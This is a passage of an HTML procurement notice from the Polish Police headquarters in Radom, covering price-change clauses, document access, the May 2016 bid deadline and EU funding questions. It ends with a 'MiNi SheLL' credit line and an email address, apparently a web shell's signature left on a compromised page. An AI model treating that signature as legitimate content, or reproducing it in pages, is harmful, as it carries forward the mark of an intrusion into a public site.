4.)	Strony dopuszczają zmianę wysokości wynagrodzenia należnego Wykonawcy w przypadku zmiany:
a.	stawki podatku od towarów i usług,
b.	wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust.3-5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę,
c.	zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne
- jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.mazowiecka.policja.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Komenda Wojewódzka Policji zs. w Radomiu
ul. 11 Listopada 37/59, 26-600 Radom
Sekcja Zamówień Publicznych KWP zs. w Radomiu
pokój 801 (8- piętro)..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.05.2016 godzina 10:30, miejsce: Komenda Wojewódzka Policji zs. w Radomiu
ul. 11 Listopada 37/59, 26-600 Radom
Sekcja Zamówień Publicznych KWP zs. w Radomiu
pokój 801 (8- piętro)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com